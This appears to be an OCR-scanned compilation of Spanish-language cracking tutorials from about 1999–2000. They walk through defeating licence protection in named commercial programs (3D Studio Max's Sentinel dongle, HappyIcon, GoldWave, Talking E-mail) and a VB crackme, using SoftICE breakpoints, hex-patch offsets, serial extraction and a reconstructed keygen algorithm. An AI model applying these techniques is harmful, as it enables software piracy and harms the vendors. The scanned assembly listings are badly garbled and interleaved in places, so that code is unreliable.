sproQuery () para asegurarnos que no vamos a hacer nosotros el trabajo duro. 


:005D9142 JZ 005D9144 <-— Nuestra rutina 
:005D9144 MOV EAX, [ESP+14] <-- Numero de bytes en la 
cadena de consulta 
:005D9148 XCHG ECX, EAX <--—-Place in ECX 
:005D9149 LEA ESL, [ESP+38] <--Get good response address. 
:005D914D MOV EDI, [ESP+1C] <-—-—-Where to place it. 
:005D9151 REPZ MOVSE 
:005D9153 XCHG ECX, EAX <-—-Reiniciar ECX y eliminar EAX. 
Ahora, strcmp() funciona tal como queriamos y no existe la necesidad de 


"ensuciarnos" las manos yendo a la caza y Captura de la rutina de compro- 
bación de la modificación Kinetix. 

De modo que observamos aqui que, aunque Kinetix ha hecho algunas 

mejoras, su protección es 1) aún fácil de aislar, y 2) presenta errores de 
aplicación. 

He oido rumores de que la versión 4 introducirá un conmutador para 

aumentar la protección de gestión de la licencia, ¡vamos a esperar y veremos 
que pasa! En cuanto a Kinetix, no se ve ningún crack por ninguna parte, los 
perdedores que piratean el programa y privan de un soporte merecido no 
dispondrían de pistas de qué hacer con esta información. 


R2.5 - 6 de octubre de 1999 


Bienvenidos a esta mochila didáctica en la cual estoy examinando de nuevo un 
viejo enemigo, un Centinela. 

Se supone que se han descargado los correspondientes archivos para este 
menester o que se tiene acceso a ellos; el primer paso es poner en marcha 
maxauth.exe para que autorize la copia de 3D Stucio Max. 

No me preocupa demasiado cómo se podría resover esta parte: bpx 
GetDlglItemTextA y averiguarlo, modificar retrocediendo al cuadro de mensaje 
( desmontaje ), o simplemente teclear 1039120D (Secuencial $ 661-93842762, 
Clave-CD V13M). 


Al poner en marcha 3DSMax, como era de esperar, se produce un error, sin 
embargo debería encontrarse fácilmente la dirección del incordio con un opor 
tuno bpx MessageBoxA. 00450F21 parece ser la rutina ofensiva, observe la 
instrucción CALL EBP, que, desde luego, s una llamada a [MessageBoxA]. 

Ahora podemos *hacer el intento* de examinar 3dsmax.exe en W32Dasnm, 

no obstante algo ocurre, inténtelo y espere; en lugar de desensamblarse, 
W32Dasm aparece como el activador involuntario de 3DSMax y con la peor 
fortuna se conseguirá un retorno a SofrICE con un error. 


En este punto, disponemos de varias opciones, o entender qué trucos se han 
usado para engañar a W32Dasm o usar IDA que no parece presentar el mismo 
problema. 

Estuve "jugando" con W32Dasm durante un momento con un bpx ReadFile 

en el dialogo de apertura del archivo y seguí laboriosamente a través de la 
asignación de memoria y la apertura del archivo, encontrando la instrucción 
ofensiva en 0045C6D2, desafortunadamente, invirtiendo el flag cero 

todavía ocurría un error en cw3220.d11, que no tenía demasiado interés intentar 
resolver. 


Nos quedamos, pues, con IDA, sin embargo, me temo que desensamblar 
3dsmax.exe lleva un buen rato. 

Entretanto, comenzaremos las pruebas usando SoftICE, una posible línea de 
ataque sería con un bpx CreateFileA, tal como se verá a continuación. 

Se sabe que el programa puede abrir un archivo activador para comunicarse 
con la mochila (en este caso sentinel.vxd) y, puesto que este archivo 

no está instalado en nuestro sistema, la llamada API ciertamente fallará, 
de modo que podemos imponer una condición IF en este punto de interrupcion. 
Vamos a hacer lo siguiente: 


bpx CreaterFileA if EAX=ffffffff <---2 signos iguales 


*Observese que también puede usarse bpio -h 378 rw. 


Con toda seguridad, al cabo de algunos retornos intrascendentes, SoftICE 
se detiene en 


:0055214C PUSH 00552120 
:00552151 CALL KERNEL32!CreateFileA 


Es ahora en este código desde donde podemos iniciar el seguimiento, 
probablemente es más sencillo continuar la exploración con el uso del 
cargador SoftICE y el comando g. 

Huelga decir que el salto condicional después de esta interrupción se tendrá 
que reservar. 

Una vez de vuelta al código, calcularemos cuantas veces podemos pulsar F12 
antes de que se desconecte el cuadro de mensaje, deberían ser unas 6 veces 


o bien la dirección 00450DFD es hasta donde se puede llegar. 


Evidentemente, 00450DFD es un buen punto de entrada, recordando que 

conocemos la dirección del cuadro de mensaje (0045FD21), esto no se 

encuentra demasiado lejos y entretanto un análisis del código no estaría de más. 
Con una simple acción escalonada y tal vez un poco de sensibilidad Zen se 
podría declarar este código sospechoso (esto que se ofrece a continuación se 


ha sacado de IDA). 

:00450E5C MOV EDX, DWORD_561248 

:00450E62 XOR EDX, 73ADh 

:00450E68 PUSH EDX 

:00450E69 LEA EDX, [ESP+678+var_464] 

:00450E70 PUSH EAX 

:00450E71 CALL SUB_552A50 

:00450E76 TEST AX,AX <---AX= 3 aqui i.e. dongle not present. 
:00450E79 JZ loc_45023 


Fijémonos en este código y entendamos porqué esto *debe* ser una 

comprobación, fijémonos también en lo que pasa cuando suspendemos 

el primer JZ, aunque parezca increible, el programa ofrece una repetición 

común y sabida del código anterior, 3DSMax obviamente trata de acceder a 

la mochila 3 veces antes de que se visualice el cuadro de mensaje. 

Podemos, usando nuestra propia guia API Centinela, tratar de asignar a este 
código una función especifica, que a mi se me antoja sproFindFirstUnit() o algo 
parecido, A0A3, pienso que es un diseñador de ID de Kinetix. 

Naturalmente, usaremos este "7242" como cadena de búsqueda para identificar 
otras comprobaciones Centinela. 


Puesto que he visto unos cuantos Centinelas en estos años, esperaría encontrar 
más o menos 15 referencias para "7242" , la proximidad de las direcciones sería 
evidente pueston que estoy convencido que es una biblioteca que usan los 
diseñadores sin reparar en si utilizan todas las funciones. 

Usando IDA se podrá observar que la mayoría de estas funciones nunca se han 
conseguido, esto el lo mejor de IDA hace el seguimiento de todas las rutas de 
ejecución y, a menos que se reciban páginas de error, puede confiarse en gran 
medida en estos resultados. 


Como añadido, existe también una comprobación en util.dll., la cual se propor- 
ciona como una interfaz para usar por los diseñadores de conexión, sin cribar 

se exporta como HardwareLockID, y parece que se comunica con 

sproFindFirstUnit ( CALL 2802BEF0O ) y sproRead() ( CALL 2802C0C0 ). 

Para recuperar el número de serie, será necesario hacer la modificación mientras 


se considere adecuado, al final de esta función EAX deberá retener el número 
de serie de la mochila; lo que sea XOR EAX, EAX no es una mochila. 
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CRACKER: 


Karpoff Spanish Tutor 


HappylIcon v 2.01 


Numero de serie 


Hacer un Keygen, Simular estar registrados, etc. 


Es un software de 32 bits, para windows 95-98 y 2000, con este puedes crear iconos, 
cursores y cursores con movimiento conviertiendo archivos graficos tanto bmp, jpg, etc. 


Principiante 


www.logipole.com 


Unicamente nuestro querido Softice v 3.xx 


PrOfesOr X FECHA: 02/10/2000 


INTRODUCCION 


Hola a todos, Bueno amigos, regreso con otro tutorial mas, ya ni me acuerdo cuantos llevo pero no 
importa, solo importa compartir los conocimientos ok!!!. 


Este programa la verdad cuando lo vi me dije !! hey parece que tiene una protección buena, vamos a 
bajarlo !! pero vaya sorpresita BUUUUUU !!! VAYA DESCEPCION !!!. 


Pero me decidi escribir este tutorial para que los principiantes se den cuenta que facil es obtener un 
serial en menos de un MINUTO. 


Ya veran por que lo digo....... 


AL ATAKE 


El primer paso es por supuesto instalar el programa, al instalarlo saldra una simpatica ventana como esta : 


5 Happylcon - Install 


Warming 


< Atrás 


Click Next if pou accept these terms. 


THIS SOFTWARE IS 4N EVALUATION VERSION 
THIS PROGRAM WILL STOP FUNTIONING 
AFTER 30 DAYS. 


YOU WILL NEXT HáWE TO REGISTER TO OBTAIN THE 
LAST UNLIMITED VERSION. 


THIS EVALUATION VERSION HAS NO LIMITATIONS 


Cancelar | 


bueno como ven aqui nos damos cuenta de las restricciones que trae esta chucheria, buen demos click en siguiente 
hasta que termine de instalarse, despues vamos y abrimos el programa para echarle un vistazo, 


2% Happylcon (unregistered) E E3 


Happylcon Misc Help 


Look in: Y Happylcon +] | A 


File name: | 
File Type: [av «Windows Audio Video Interleawe +] 
Target folder 


| 
B WProgram Files+Happylcon LJ] | 


J 


dla (1+2*/|?2 3 


TT 16x2 

FT 1616 

TT 16x256 
7 16x24 bits 
T” 16x32 bits 


7 64x2 
TT 64x16 
MT 54x256 
TT 64824 bits 
T”64x32 bits 


— Formats - size x colors — 


1 32x2 
32:16 

T” 324256 
T” 32:24 bits 
T— 32x32 bits 


1 96x2 

TT 96x16 

T 7 96x256 
T” 96x24 bits 
T” 96x32 bits 


1” 48x2 
T— 48x16 
[748x256 

T” 48x24 bits 
T” 48x32 bits 


mm. 

TT x16 

7 x256 
[7 x24 bits 
IT” x32 bits 


Free: 5 | 


First, select the files] to convert, 
next choose the format(s] to 
include in the icon and finally 
click on this huge button --> 


€ do 


FT Transparent background - 0| 


Create from scanner 


Create as: 
Icon 


como podemos ver en la parte superior aparece un string que dice ( UNREGISTERED ) mmmmm.... 


ahora hechemosle un vistazo en el menu de help y ahi encontramos una opcion que dice register damos click en ella y 
nos manda a una ventana en la cual podemos insertar un nombre y numero de serie, bueno pues manos a la obra, ya 
sabemos por donde atacar, ahora reinicien la PCera e inicien con el Softlce, una vez iniciado ejecuten el programa e 
inserta un nombre y numero de serie, que en mi caso puse: 


Register 


PA 


+una vez insertado demos click en OK yyyyyyyyyy!!!! 
R e gis ter 


XK 


insertemos nuestro nombre y serial pero antes ahora demos control D y saltaremos al SoftICE eh insertemos un Break 
Point BPPX MESSAGEBOXA y demos otra vez Control D y ahora si demos click en OK !! y saltamos al Softice, 
ahora demos Fl 1 una sola vez y nos aparece la ventana de 


tegister 


XK 


damos click en ACEPTAR y saltamos de nuevo al Softice en : 

414127 call [user32!'messageboxa] 

41412d push 01 

41412f push ebp 

ahora sube unas cuantas lineas hasta donde encuentres algo como esto : 

414116 cmp e€ax,ecX <oooommmo==- lugar donde se comprueba nuestro serial con el correcto 


414118 jz 00414148 <ocomomoo-- salta si no es igual 


bueno creo que ya dimos con la instruccion que compara nuestro serial, pero para ver el serial correcto tenemos que 
poner un break point en 414116 para eso tenemos que borrar todos los breakpoints puestos y despues ponemos en el 
Softice: 


be* 
y despues 
bpx 414116 


una vez hecho esto, nos vamos e insertamos otra vez un serial y un nombre y damos ok yyyyyyyyy saltamos 
directamente a la Dirección de memoria 414116 una vez ahi vemos el contenido de EAX y ECX con la instruccion 
?EAX y ?ECX nos mostrara lo siguiente : 


069%f6bc7 0123456789 <---- nuestro numero introducido 


DB97424 3684123202 <oomomom NUESTRO SERIAL CORRECTO !!!n 


espero que les guste, alguna duda o sugerencia favor de escribirme a mi email. 


NOTA: por cierto un saludo a el grupo Kfor y a txeli, y recuerda si quieres que tus tutoriales aparescan en la 
"COMPILACION DE TUTORIALES 2000" favor de enviarmelos a mi email 


profesor_xG hotmail.com 
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Herramientas: 


Karpoff Spanish Tutor 
GoldWave v4.18 


Número de Serie. 
Herramienta para editar Sonido 


Aficionado 


http://www.gqoldwave.com 


Editor Hexa, Wdasm y Softice 


KuaTo_ThoR 02/10/2000 


INTRODUCCION 


Muy buenas a todos una vez más. A pesar de que he puesto como herramientas Wdasm y el editor hexa, 
realmente no nos son indispensables, la verdad es que el Wdasm lo he usado porque cuando instalé el 
programa, no tenía ejecutado softice, así que eché un vistazo con Wdasm y me di cuenta de la ridícula 
protección, si es que se pude llamar así. 


Lo primero que vamos a hacer es localizar la zona calinte, luego veremos como encontrar el serial válido, 
luego como hacer que el programa nos dé el serial válido, y finalmente analizaremos el código para crear un 


Keygen. 


AL ATAKE 


Preliminares. Obtener información. 


Bueno este trabajo va a ser corto, nada más iniciar el programa, nos aparece la ventana de ayuda, y en la primera línea nos 
dice que es totalmente funcional durante 30 días. 


Buscamos algún lugar donde se pueda meter un código, en Help nada, en Window nada, ahí está, en Options, Register, 
metemos cualquier cosa y nos aparece un bonito mensaje, ''Invalid registration. Please...”, lo anotamos por ahí y 
continuamos la marcha. 


El ejecutable, GoldWave.exe, ya os digo que no está comprimido, si queréis podéis comprobarlo con File Analizer, con 
Getyp o con cualquier otro. 


A por él. 


Como ya os he dicho no tenía ejecutado softice, y por no reiniciar, que con gitindUs nunca se sabe que esperar, 


ES 
A . Jen R 
desensamblamos con Wdasm, y buscamos nuestra frasecita, ya sea en las String References o directamente en Buscar 


Texto ¡91 Conviene pulsar una par de veces para saber en cuantas ocasiones aparece la frase, esta vez solamente en una. Y 
nos aparece tal que aquí: 


:00460CDC 5F pop edi 

:00460CDD 5E pop esi 

:00460CDE 50 push eax <-- ¿Será uno de estos es nuestro código Gieno? 
:00460CDF E834F8FFFF call 00460518 <-- Compara códigos Gieno y Malo 
:00460CE4 59 pop ecx 

:00460CE5 84C0 test al, al 

:00460CE7 0F8597000000 jne 00460D84 <-- Saltamos a chico Gieno si al<>0 


* Possible StringData Ref from Data Obj ->"Register" 
| 

:00460CED 8B15BCEA4E00 mov edx, dword ptr [O004EEABC] 
:00460CF3 8B4E43 mov ecx, dword ptr [esi+43] 
:00460CF6 8B01 mov eax, dword ptr [ecx] 

:00460CF8 6A30 push 00000030 

:00460CFA 52 push edx 


* Possible StringData Ref from Data ObJ] ->"Invalid registration. Please " 
->"be sure to enter your name and " 
-=>"password exactly as given in the " 
-=>"license." 


:00460CFB 6841EF4E00 push 004EEF41 <-- OFFSET 602FB, pillad esto pa'luego. 


Creo que más claro no puede estar, bueno sí, si nos pusiesen directamente el password ;-). La única duda es si antes del call 
tendremos nuestro código gieno, o lo calculará dentro. 


Efectivamente, si realizamos el salto a 00460D84, estaremos en la zona de registrado, si vamos alli con Go to Code Location 


63 
e veremos que aparecen cosas como las siguientes: 


Possible StringData Ref from Data Ob] ->"goldwave.ini" <--— Archivo sospechoso 
Possible StringData Ref from Data Obj ->"Register" 

Possible StringData Ref from Data Obj ->"First" <-- Nombre 

Possible StringData Ref from Data Ob] ->"Last"  <-—- Apellido 


XA AX x 


* Possible StringData Ref from Data Obj ->"Password"  <-- Pues eso 


Si el programa tuviese alguna complicaión especial, ya sabríamos algo interesante, donde guarda los datos de registro, 
aunque en esta ocasión sólo nos servirá para saber como desregistrarnos, borrando el password. 


Creo que está claro lo que hay que parchear ¿¿no??, nos situamos sobre 00460D84, y miramos el offset, que es 602E7. 
Vamos al editor hexa, y cambiamos el 85 por un 84. Guardamos los cambios, volvemos a ejecutar el programa, metemos los 
datos que nos de la gana, y ya está registrados, volvemos a iniciar el programa, y no seguimos registrados, al menos hay 
hecho algo bien en la protección, vuelve a comprobar el password en otro sitio, podríamos buscarlo, pero no me quiero 
enrollar más con esto, podéis hacerlo como ejercicio, vamos a por el serial. 


A por el Código Giieno 


Para esto no queda más que cargar softice (aunque podríamos hacerlo con TRW), así pués reiniciamos nuestra máquina.( y 
rezamos para que no nos joda el win ;-)) 


Cargamos nuestro ejecutable con el Symbol Loader, os recuerdo que es GoldWave.exe, y ponemos un break en el punto 
00460CDE, es decir bpx 460cde, que es donde creemos que está nuestro código y si no está, nos meteremos dentro del call a 
buscarle. 


Lo dicho, ejecutamos, metemos los datos de registro que más nos gusten , por ejemplo de password podemos poner 
147258369, damos a OK, y salta Sice justo donde queríamos, miramos los registros, con el comando d, y si queréis con ?, 
pero lo único que vemos son los datos que hemos metido nosotros, así que tendremos que meternos en el Call. Una vez sobre 
la instrucción pulsamos F8, para entrar en la llamada. Vamos pulsando F10 pero con cuidado cada vez que nos acerquemos a 
una llamada, comprobando los registros al entrar y al salir. Por cierto, si en la ventana de Sice no os aparecen todos los 
registros, eax, edx, ecx, ebx, etc... pulsad F2 y aparecerán. Además si os funciona el ratón, si pulsáis con el botón derecho 
sobre ellos, y pulsáis a Display, obtendréis lo mismo que si utilizaséis el comando d . Por donde iba,....., por F10, pasamos 
algún Call hasta llegar a : 


:0046054A 5E pop esi 

:0046054B 53 push ebx 

:0046054C E8CIFEFFFF call 00460418 <-- Aquí está el código Gieno 
:00460551 59 pop ecx 

:00460552 85C0 test eax, eax 

:00460554 7504 jne 0046055A 

:00460556 33C0 xor eax, eax 

:00460558 EB27 jmp 00460581 


Si miramos los registros al salir del Call, por ejemplo d edx, veremos que donde antes estaba nuestro código chungo, ahora 
hay una serie de letras bastante sospechosa, apuntadla no vaya a ser nuestro password correcto ;-). 


Si lo probamos con el nombre y apellidos de antes, veremos que ya somos usuarios registrados, además podemos ver nuestro 
código en goldwave.ini. 


Un Jueguecito más 


Vamos a ver como hacer que el propio programa nos de el código correcto para la combinación Nombre-Apellido que 
metamos. 


Si os fijáis arriba donde aparece el mensaje de"Fallaste" es en la siguiente instrucción: 
:00460CFB 6841EF4E00 push 004EEF41 
Con el Push, mandamos la frasecilla de "Fallaste" a la pila, pero, ¿y si mandásemos el código correcto? 


Unicamente tenemos que localizar la dirección donde mete nuestro código, y cambiar esta instrucción por push dirección- 


código. ¿Cómo encontramos la dirección? Para eso tenemos softice, si todavía tenéis el break en 0046054C, sólo hay que ir 
allí, y en lugar de d edx, metemos ?edx, y nos aparecerá justo debajo de donde lo hemos escrito algo parecido a esto: 


0078EF12 XXXXXXXXX  'o)pÚ' 


Ésta es exactamente la dirección de nuestro código, sólo tenemos que cambiar push 4EEF41 por push 78EF12. En este caso 
push 78EF12 es en bytes 6812EF78. Teniendo en cuenta que el offset es 602FB, ya sólo queda hacer los cambios en el 
editor hexa. Si lo hacéis y probáis a meter unos datos cualquiera veréis que en lugar del mensaje de error aparece el código 
correcto. Uffff ! 


Generador de Claves 
Ahora vamos a por lo bueno. 


Como ya sabemos de donde sale el código gijeno, no tenemos más que ir allí, y ver que pasa. Únicamente voy a poner las 
zonas donde calcula algo de nuestro código, por motivos de espacio, pero primero voy a intentar explicar que es lo que va a 
hacer el programa. Lo primero que hace es calcular a partir del nombre un número (A), a continuación hace lo mismo con el 
apellido (B), estos dos números los almacena, y luego suma el tamaño de nuestro nombre con el de nuestro apellido, y a 
partir de ese número genera otro a base de sumas y productos, a este número le suma A y obtenemos (C), y con las mismas 
operaciones de antes ahora sobre C obtiene otro número, al que para terminar suma B, obteniendo finalmente (D). Con este 
número, y realizando una serie de divisiones, iremos obteniendo las caracteres de nuestro password. Vamos a verlo, espero 
expliacarlo más o menos bien: 


Cálculo de A: (número obtenido a partir del nombre) 
Llegamos a inicio con eax = n. donde 'n' es la longitud de nuestro nombre. Además edx apunta a nuestro nombre. ebx = 0 
:00460444 OFBEOA movsx ecx, byte ptr [edx] <-- Pasamos a ecx una letra del nombre. 


Empezando por la última letra. 
:00460447 03C8 add ecx, eax <-- ecx=ecx+eax 
:00460449 03D9 add ebx, ecx <-- ebx=ebx+ecx. Ebx es nuestro acumulador. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

| :00460442 (U) 

| 

:0046044B 4A dec edx <-- INICIO. Venimos de 460442. edx=edx-1 

:0046044C 8BC8 mov ecx, eax <-- ecx=eax. Ecx tiene ahora la longitud del nombre. 
:0046044E 83C0FF add eax, FEFEFFFF <-- eax=eax-01 

:00460451 85C9 test ecx, ecx 

:00460453 75EF jne 00460444 <-- Si ecx<>0 saltamos arriba. (si quedan letras) 


Cuando salgamos del bucle, tendremos en ebx el número que nos interesa. 
Cálculo de B: (número obtenido a partir del apellido) 


Llegamos a inicio con eax = n donde 'n' es la longitud de nuestro apellido. Además edx apunta a nuestro apellido. ebx = A. Es 
exactamente igual que antes, pero en lugar de ir acumulando el número en ebx lo hace en esi. Aquí tenéis el código: 


:00460476 OFBEOA movsx ecx, byte ptr [edx] <-- Pasamos a ecx una letra del apell. 


Empezando por la última letra. 
:00460479 03C8 add ecx, eax <-- ecx=ecx+eax 
:0046047B 03F1 add esi, ecx <-- esi=esitecx. Esi es nuestro acumulador. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00460474 (U) 


:0046047D 
:0046047E 
:00460480 
:00460483 
:00460485 


Ahora el número estará en esi. 


4A dec edx <-- INICIO. Venimos de 460442. 
eax <-- ecx=eax. 
FEFFFFFF <-- eax=eax-01 


8BC8 mov ecx, 


83C0FF add 


85C9 test ecx, 
75EF jne 00460476 <-- Si ecx<>0 saltamos arriba. 


Cálculo de C y finalmente D: 


:0046049F 
:004604A1 
:004604A2 
:004604A4 
:004604A6 
:004604A9 
:004604AC 
:004604AF 
:004604B2 
:004604B5 


:004604B8 
:004604BA 


:004604BD 
:004604BF 
:004604C2 
:004604C5 
:004604C8 
:004604CB 
:004604CE 
:004604D0 
:004604D2 


:004604D6 
:004604D8 


03F8 add edi, 


59 pop ecx 


8BC7 mov eax, 
8BDO mov edx, 


8B4508 mov 
C1E204 shl 
8D1452 lea 
8D1492 lea 
8D1492 lea 
8D1492 lea 


0O3DA add ebx, 


8B55FC mov 


8BCB mov ecx, 


C1E104 shl 
8D0C49 lea 
8D0C89 lea 
8D0C89 lea 
8D0C89 lea 


03F1 add esi, 
8BDE mov ebx, 


8D741032 


lea esi, 


eax, 
ecx 


eax <- 


eax, dwor 
edx, 
edx, 
edx, 
edx, 


edx, 


dwor 
dwor 
dwor 
dwor 


edx, dwor 


ecx, 
ecx, 
ecx, 
ecx, 
ecx, 


dwor 
dwor 
dwor 
dwor 
ecx <- 


esi <- 


= edi 


d ptr 


d ptr 
d ptr 
d ptr 
d. prr 


d pir 


d 
d 
d 
d 


ptr 
ptr 
ptr 
ptr 


esi 


85DB test ebx, 


ebx 


ebx <-- edx=C 
04 <-- Otra vez movemos nuestro número 


dword ptr 


edx=edx-1 


Ecx tiene ahora la longitud del apellido. 


(si quedan letras) 


Suma de longitudes de nombre y apellido 


edi <-- eax=edi 
eax <--edx=eax. Aquí tenemos ahora la suma de longitudes. 


ebp+08] 


edx+2*edx] 
edx+4*edx] 
edx+4*edx] 
edx+4*edx] 


ebp-04] 


ecx+2*ecx] 
ecx+4*ecx] 
ecx+4*ecx] 
ecx+4*ecx] 


esi + ecx 


ebx=esi=D 


<- edx=edx+2*edx 
<- edx=edx+4*edx 
<- edx=edx+4*edx 
<- edx=edx+4*edx 


edx <- ebx=ebx+tedx=A+tedx= C 


<- ecx=ecx+2*ecx 
<- ecx=ecx+4*ecx 
<- ecx=ecx+4*ecx 
<- ecx=ecx+4*ecx 


=B + ecx= D 


[eax+edx+32] 


7425 je 004604FF <--— Si ebx=0 vamos a la mierda. 


Creamos el código en si mismo: 


* Referenced by a 


(U)nconditional or 


04 <-—- Movemos nuestro número a la izquierda. 


EJ: 


de 9->90 


a la izquierda. 


(C)onditional Jump at Address: 


| :004604FD (C) 
:004604DA 8BC3 mov eax, ebx <- eax=edx ( = D en la primera vuelta) 
:004604DC 33D2 xor edx, edx <-— edx=0 
:004604DE B91A000000 mov ecx, 0000001A <- ecx=1A (hex)== 26 (dec) 
:004604E3 F7F1 div ecx <- eax = eax div ecx y edx = eax mod edx = resto 
:004604E5 80C241 add dl, 41 <- Al resto le sumamos 41 hexa = 65 dec 
:004604E8 8BC3 mov eax, ebx <- eax=ebx ( = D en la primera vuelta) 
:004604EA 8816 mov byte ptr [esil], dl <- Donde teníamos el 

Caracter de código ASCII 'dl' 
:004604EC 33D2 xor edx, edx <- edx=0 
:004604EE B91A000000 mov ecx, 0000001A <- ecx=1A 
:004604F3 46 inc esi <- esi=esi+1l. Desplazamos el código chungo un lugar. 
:004604F4 F7F1 div ecx <- volvemos a dividir. 
:004604F6 FF45FC inc [ebp-04] 
:004604F9 89C3 mov ebx, eax <- ebx=eax; 
:004604FB 85DB test ebx, ebx 


código Malo movemos el 


en hexa. 


:004604FD 75DB jne 004604DA <- Si ebx<>0 volvemos para arriba. 


Bueno pués ya está, con este bucle final vamos sacando las letras de nuestro código gijeno, espero haberlo dejado claro, si no 
es así no dudéis en preguntarme cualquier cosa. 


Para terminar aquí os dejo, para el que lo quiera, un programilla en Pascal, para nuestro keygen. GWave.pas. 


«orto » 


Nada más por esta vez, espero que os haya resultado útil este tute. No olvidéis que nuestro objetivo sólo es aprender. (sin 
contar con la diversión que supone por supuesto ;-)) 


Hasta la próxima... 


«oo =ézeona » 


P.D.: Si hay algo que no he dejado sufientemente claro o lo que sea, ya sabéis: kuato_thorfhotmail.com 
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Programa: Demian VBCrackME Trial 


Herramientas: Softice W32dasm Frogsice Filemon 


introduccion 


arrancamos el programa, y no hace absolutamente nada. puede ser que haya detectado el sice. 

arrancamos el frogsice, para esconder el debugger, y volvemos a ejecutar el programa. 

pero sigue sin hacer nada. 

arrancamos filemonitor, para ver que ficheros toca. y sorpresa, ¡¡ha leido el autoexec.bat!! 

vamos, que lo que hace es buscar alguna referencia al winice.exe en el autoexec, y si lo encuentra, se para. 
bueno, renombramos el autoexec para ver que pasa, y mira por donde, ahora funciona (Je je, pero por que 
tenemos el frogsice ejecutandose). si quitamos el frogsice, vemos como al ejecutar el programa, se para como 
al principio. 


bueno, por lo menos ya sabemos como funciona el programa, otra cosa es como atacarle. 


abrimos el sice, y pensamos un instante, vamos a poner un breakpoint en vbaend, que es la funcion, que sale de los 
programas de vb. ponemos 'bpx msvbvm60!__vbaend'. y pulsamos ctrl+d. 

y se nos para el sice. pero se nos para dentro de la propia rutina. no problem. editamos con el comando 'a', y ponemos 
un simple 'ret'. 

ejecutamos el ret, y vemos la llamada al vbaend. y justo encima, vemos un salto condicional (je), que si nos fijamos 
bien, salta justo despues del vbaend :-d 

bien, apuntamos la dirección, para parchearla después poniendo un simple jmp. 


y repetimos la operación hasta que no haya más vbaend (unas 6 veces). no siempre se soluciona con un jmp, a veces, 
es necesario nopear (la segunda vez). 

bien, ahora el programa funciona, tanto si tenemos el sice, como si no. pero, si adelantamos un mes la fecha, nos sale el 
temido 'your trial version is expired!'. 


bien, ahora, solucionaremos la protección de fecha, abrimos el w32dasmvb, y desensamblamos el ejecutable, 
buscamos la la cadena de antes, y vamos un poco más arriba, veremos otro salto condicional (¡e xxxxx), solo hace falta 
cambiarlo por un j¡mp. 

pero ahora es un poco más complicado, porque lo que hay que convertir en un ¡mp no es la típica sentencia 740d, si no 
esta otra 0f84d3000000. pero, entramos el sice, ponemos un breakpoint a dicha instrucción y con el comando 'a', 
ponemos el ¡mp a donde corresponda, y copiamos los bytes, que deben quedar así e2d400000090. 


y ya está. el programa funcionará siempre, con o sin el sice. y da igual la fecha que pongas. eso si, no hagas mucho 
caso a los dias restantes :-d 


txotxo 
visita mi página web: www.geocities.com/ttxotxo 
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PEREAERE | Talking E-mail y ComExplorer 1.6 


prorEccion: | Serial, Limitación de Tiempo 
Descripcion: | Utilitarios 

Disicultad: | Facilucha, como siempre ;-) 
Pomona: | http://www. 4developers.com 
Berramientas: | Softice, W32dasm y Smartcheck 


INTRODUCCION 


lo que me decidió a escribir este tutorial fue el precio del comexplorer 1.6 ($ 150). un utilitario interesante . 
normalmente me va bien con programas de menos de $20 y a partir de allí se empieza a complicar. si hubiera 
sido freeware no lo hubiera instalado en mi pc, pero siendo así no pude evitar la tentación de intentar 
crackearlo. en realidad todo comenzó con talking e-mail 3.0 de los mismos programadores y al buscar un 
programa para dejarte de tarea apareció el anteriormente citado. 


talking e-mail 


instalamos y corremos el programa y nos aparece un viejito parlanchin y soplacornos que nos da la bienvenida junto 
con una pantalla que nos invita a registrarnos. introducimos nuestros datos (pone los tuyos sin miedo) en mi caso 
quedó así: 


Talking E-mail - UNREGISTERED VERSION 


le E-mail Sn o Stop Talking 
Listen to pour E-mail instead of reading it. 
Copyright 1997 - 2000 4Developers LLC. etakM4developers.com 


Thank pou for trying Talking E-mail. 


Talking E-mail enables you to listen to your E-mail while pou are working, surfing 
the Web, watching TW or doing anything else. 


Trial Ends: In 6 Days. 


IE you wish to Order pour copy of Talking E-mail, check the options below. We 
hope you'll enjoy using Talking E-mail. 


ORDER online and receive the unlock code to remove all limitations. If you 
have already ordered Talking E-mail type in the User Name and Registration 
Code and click the 'Unlock' button. 


User Name: [Yerba Mate 
Registration Code: [123456789] 


Read Me | Order By Mai | Other Products | Buy Now! | Try lt | 


pulsamos unlock y esto es lo que obtenemos: 
UNREGISTERED User 


user name and registration code you have LEGALLY obtained from 4Developers LLC. 


€) The registration information pou have entered could not be validated. Please re-enter the 
Make sure the case is correct. 


If you have not registered yet, you can click one of the buttons below to see how to order 
Talking E-mail. For help E-mail etalk(B4developers.com 


como no sabemos inglés, no es nuestra culpa que no entendamos la parte que dice .....legally obtained ....;-) 


boto 
a lo nuestro, desensamblamos con 'w32dsm89"' y oh!, esto es lo que encontramos al pulsar 


W32Dasm List of String Data Items 


To Search Disassembly for String Data, Double Cli 


es una aplicación hecha en vbs5. si leiste los tutoriales anteriores estarás de acuerdo en utilizar smartcheck. corremos el 
smartcheck, abrimos el talkmail pulsamos 'program' y 'start'. cuando el talkmail se carga, ponemos en la ventana 
nuevamente nuestros datos (nombre y número de serie). presionamos unlock y esperamos que aparezca el mensaje de 
error, luego vamos a program' y 'end'. cuando el smartcheck termina de hacer su trabajo, ponemos en la ventana de 
búsqueda '_vbastrecmp' o bien ' 12345678 ' ( si pones 1234567890 no lo va a encontrar porque es muy largo ). oprimes 
el botón 'find' varias veces y esto es lo que encuentra: 


3] |_vbas tmp 


J Alé] | 


%  _ vbaFreeSti[LPBSTR:D06BE7B8] retums DWDRD:20 
$  _ vbaFreevaWARIS£NT:Integer:1) returns DWODRD:20 


+ 


TALKMAIL EXElDO0O55E4D [no debug in 
[2)- unsigned short * stringl = OD4F13DO 


4 —_ wvbaStiCmpíString:'"12345678...”, String:"S469-AG8...'] retums DWDRD:1 = "1234567990" 
+ ; —vbaFreestilLPESTA:DOBBE7C4] retums DWORD:30 E unsigned short * string2 = OO4EC3CS 
$% LeníString:"Yerba Ma...'"] retums LONG:10 - "2459 AGSVHOVHOG" 


E 9% LCasetíSting: "Yerba Ma..."'] 
%  _ vbaStiMove(String: "yerba ma...”, LPBSTR:006BE7B8) returns DWORD:4F1604 
HS  _ vbaStiCopyíString:""S469-", LPBSTR:D06BE7C4]) retums DWORD:4F1460 


Show All Events 


si no podes encontrar nada, tenes que pulsar ps y obtendras lo mismo que en el gráfico, pero con tus 
datos. efectivamente '8469-rg8v*qv*qg' es el serial válido en mi caso. 


si queres practicar con soft-ice y tener una idea de lo que estas viendo,desensamblalo con w32dsm89vb que también 
encontrarás en esta página. 


comexplorer 1.6 


